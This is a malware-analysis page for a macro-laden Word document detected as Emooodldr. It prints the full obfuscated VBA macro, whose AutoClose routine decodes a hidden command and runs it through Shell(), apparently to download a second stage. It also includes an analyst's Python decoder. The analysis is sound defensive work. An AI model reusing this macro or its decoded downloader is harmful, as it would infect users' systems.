Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 9248bf0411d30d4f…

MALICIOUS

Office (OOXML)

Size: 33.3 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-08-04
MD5: 7ea4bef65f98165b6d04252025b0c9a5
SHA-1: 11757e130582f7b9ed748f5f870264efa2af618c
SHA-256: 9248bf0411d30d4f1616f3a2d7a055b4692c87717033a36ab630ba20ff599489
Risk score: 244

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

ClamAV identifies the file as malicious with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis of the embedded VBA project (word/vbaProject.bin) found an AutoClose routine, Word's auto-execution entry point that fires when the document is closed (reported below under the OLE_VBA_AUTOCLOSE heuristic as "Auto_Close macro"). AutoClose passes a long string of two-digit indexes through a character-table decoder (supporto() and coppia()) and hands the result to Shell() indirectly via Application.Run; the window-style argument is 0, so the spawned process is hidden. The decoded string is executed as a command line, most likely a downloader for a second-stage payload, which is characteristic of the Emooodldr family. Because the trigger is document close rather than open, a sandbox that opens the file and never closes it will not observe the execution.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (all found in document text, i.e. the OOXML body / shared strings):
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2006/wordml
    All six are XML namespace identifiers that every Word-generated OOXML document carries; they are never contacted at runtime and are not indicators of compromise. Any network indicator this sample has would sit inside the macro's encoded string and is only visible after decoding it.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2436 bytes
SHA-256: 8b9488b32dcc0c8ef025852e079d51e90ac55091d77bf04578e04f26db729337
Detection
ClamAV: No threats found (the signature matches the vbaProject.bin container below, not the decoded source text)
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s). The blob is the all-digit argument of supporto() in AutoClose(): it satisfies the base64 character-class check but is a run of two-digit decimal indexes into the coppia() table, not base64, so a base64 decoder will not recover it.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function coppia(positivo As Integer) As String
 Dim civile() As Variant
 civile = Array("s", ")", "T", "O", "?", "u", "X", "-", "h", "d", "$", "E", ",", "/", "W", "f", "o", "g", "m", "r", "A", "(", "l", "P", "+", "I", "b", "3", "V", "t", "j", ";", "F", "i", "N", "n", "D", "1", "'", "4", "a", " ", "x", "y", "=", "w", "8", "e", "p", "H", "v", "B", "\", "S", "C", ".", "c", ":", "2")
 Dim rischio As Integer
 
 For rischio = LBound(civile) To UBound(civile)
   If rischio = positivo Then
    coppia = civile(rischio)
   End If
 Next
 
End Function

Function braccio(uragano As String)
    uragano = StrConv(uragano, vbUnicode)
    braccio = Split(Left(uragano, Len(uragano) - 1), vbNullChar)
End Function

Function supporto(stirpe As String) As String
  Dim inter As Integer
  Dim peggio As String
  Dim mensola As Variant
  mensola = braccio(Trim(stirpe))
  For rischio = 0 To Len(stirpe)
  
    If (rischio + 1) <= UBound(mensola) Then
    Dim volatile As String
    volatile = mensola(rischio)
    rischio = rischio + 1
    volatile = volatile + mensola(rischio)
    
    peggio = peggio + coppia(Int(volatile))
    End If
  Next
  
  supporto = peggio
End Function

Public Function pavone(andrea As String)
  Shell andrea, 0
End Function

Sub AutoClose()
 Call Application.Run("pavone", supporto("561809554742474113564148164547190008472222410711424756415143484000004107341623410754161818403509412134474507032630475629415343002947185534472955144726542233473529015536164535221640093233224721380829294857131340403509474717354047403543555616181335333516130005484719551809153812411047355057202323362002204124413852351843234728304955474247380131415329401929072319165647000041104735505720232336200220385235184323472830495547424738314121344745070326304756294153430029471855344729551447265422334735290155361645352216400953291933351721380829294857131340403509474717354047403543555616181300554808480433094400054847193801314125110621213447450703263047562941534300294718553447295514472654223347352901553616453522164009532919333517213808292948571313273755374639555827395537394613005548084838010131"))
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11776 bytes
SHA-256: ea4523ee991c62bbbd842fe3d83b73fedaf3d5aceed5c0d28a56640838ce3f3f
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
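The two analysis steps this page reports, the macro heuristics (VBA project part, auto-exec routine, Shell() call, long encoded blob) and the recovery of the string that AutoClose() feeds to Shell(), as one added example. This is the editor's code, not the analysis tool's and not part of the sample: the regex lists are an approximation of the heuristics named above (the tool's own rules are not on the page), the .docx it scans is constructed in memory with a placeholder vbaProject.bin, and the character table and encoded string are copied verbatim from the macros.bas preview above. Running it prints the recovered command line and the URLs it contains.

```python
"""Static triage and payload decoding for the sample described on this page.

Added example written for this page; not the analysis tool's code and not part
of the sample. Part 1 approximates the OOXML_VBA, OLE_VBA_AUTOCLOSE,
OLE_VBA_SHELL and EXTRACTED_FILE_STATIC_TRIAGE checks over a .docx constructed
in memory (placeholder vbaProject.bin) and over the macro shown above. Part 2
mirrors the macro's own decoder (coppia()/supporto()) so the command line hidden
in AutoClose() can be recovered without ever opening or closing the document.
"""
import io
import re
import zipfile

# ---- 1. Triage checks (editor's approximation of the page's heuristics) ----
AUTOEXEC = re.compile(r"\b(Auto_?Open|Auto_?Close|Auto_?Exec|AutoNew|Document_Open|"
                      r"Document_Close|Workbook_Open)\b", re.I)
EXEC_CALLS = re.compile(r"\b(Shell|WScript\.Shell|ShellExecute|CreateObject|Application\.Run)\b", re.I)
# "base64-like blob": a long run of base64-alphabet characters. An all-digit
# string such as this sample's index string matches too, so the label does not
# imply base64; digit_only_blobs below keeps the two cases apart.
LONG_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def find_vba_parts(ooxml_bytes: bytes) -> list[str]:
    """Zip members holding a VBA project (word/vbaProject.bin for Word), whatever the extension says."""
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        return [n for n in z.namelist() if n.lower().endswith("vbaproject.bin")]


def triage_vba_source(vba_source: str) -> dict:
    """Apply the macro heuristics to decoded VBA text and return the hits."""
    blobs = LONG_BLOB.findall(vba_source)
    return {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(vba_source)}),
        "exec_calls": sorted({m.group(1) for m in EXEC_CALLS.finditer(vba_source)}),
        "long_blobs": len(blobs),
        "digit_only_blobs": sum(b.isdigit() for b in blobs),
    }


def build_macro_docx() -> bytes:
    """Constructed minimal OOXML container with a VBA part; the part's bytes are a placeholder."""
    types = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
             '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
             '<Override PartName="/word/document.xml" '
             'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 60)  # placeholder, not the real project
    return buf.getvalue()


# ---- 2. Decoder mirroring coppia()/supporto() from macros.bas --------------
# Character table copied verbatim from coppia() (index -> character).
CIVILE = ["s", ")", "T", "O", "?", "u", "X", "-", "h", "d", "$", "E", ",", "/", "W",
          "f", "o", "g", "m", "r", "A", "(", "l", "P", "+", "I", "b", "3", "V", "t",
          "j", ";", "F", "i", "N", "n", "D", "1", "'", "4", "a", " ", "x", "y", "=",
          "w", "8", "e", "p", "H", "v", "B", "\\", "S", "C", ".", "c", ":", "2"]
# Argument passed to supporto() inside AutoClose(), copied from the macro above.
ENCODED = "561809554742474113564148164547190008472222410711424756415143484000004107341623410754161818403509412134474507032630475629415343002947185534472955144726542233473529015536164535221640093233224721380829294857131340403509474717354047403543555616181335333516130005484719551809153812411047355057202323362002204124413852351843234728304955474247380131415329401929072319165647000041104735505720232336200220385235184323472830495547424738314121344745070326304756294153430029471855344729551447265422334735290155361645352216400953291933351721380829294857131340403509474717354047403543555616181300554808480433094400054847193801314125110621213447450703263047562941534300294718553447295514472654223347352901553616453522164009532919333517213808292948571313273755374639555827395537394613005548084838010131"
# The macro's execution path (pavone and AutoClose from the preview above), used as triage input.
MACRO_EXCERPT = ("Public Function pavone(andrea As String)\n  Shell andrea, 0\nEnd Function\n\n"
                 'Sub AutoClose()\n Call Application.Run("pavone", supporto("' + ENCODED + '"))\nEnd Sub\n')


def coppia(positivo: int) -> str:
    """Table lookup; "" for an out-of-range index, since the VBA never assigns a result then."""
    return CIVILE[positivo] if 0 <= positivo < len(CIVILE) else ""


def decode_pairs(stirpe: str) -> str:
    """Consume two-digit pairs like supporto(); a trailing unpaired digit is
    dropped, matching its (rischio + 1) <= UBound(mensola) bounds check."""
    s = stirpe.strip()  # supporto() Trim()s its input before splitting it
    out = []
    for i in range(0, len(s) - 1, 2):
        pair = s[i:i + 2]
        if not pair.isdigit():  # VBA Int() would raise Type mismatch here
            raise ValueError(f"non-numeric pair {pair!r} at offset {i}")
        out.append(coppia(int(pair)))
    return "".join(out)


def extract_urls(command: str) -> list[str]:
    """Pull the download URLs (network IOCs) out of the recovered command line."""
    return re.findall(r"https?://[^\s'\"()]+", command)


if __name__ == "__main__":
    print("VBA parts:", find_vba_parts(build_macro_docx()))
    print("Triage:", triage_vba_source(MACRO_EXCERPT))
    cmd = decode_pairs(ENCODED)
    print("Decoded:", cmd)
    print("URLs:", extract_urls(cmd))
```

Re-implementing the decoder instead of detonating the document sidesteps the AutoClose trigger entirely, and decode_pairs() preserves the VBA loop's edge behaviour (trailing odd digit dropped, out-of-range index contributes nothing) so its output is exactly what Shell() would have received.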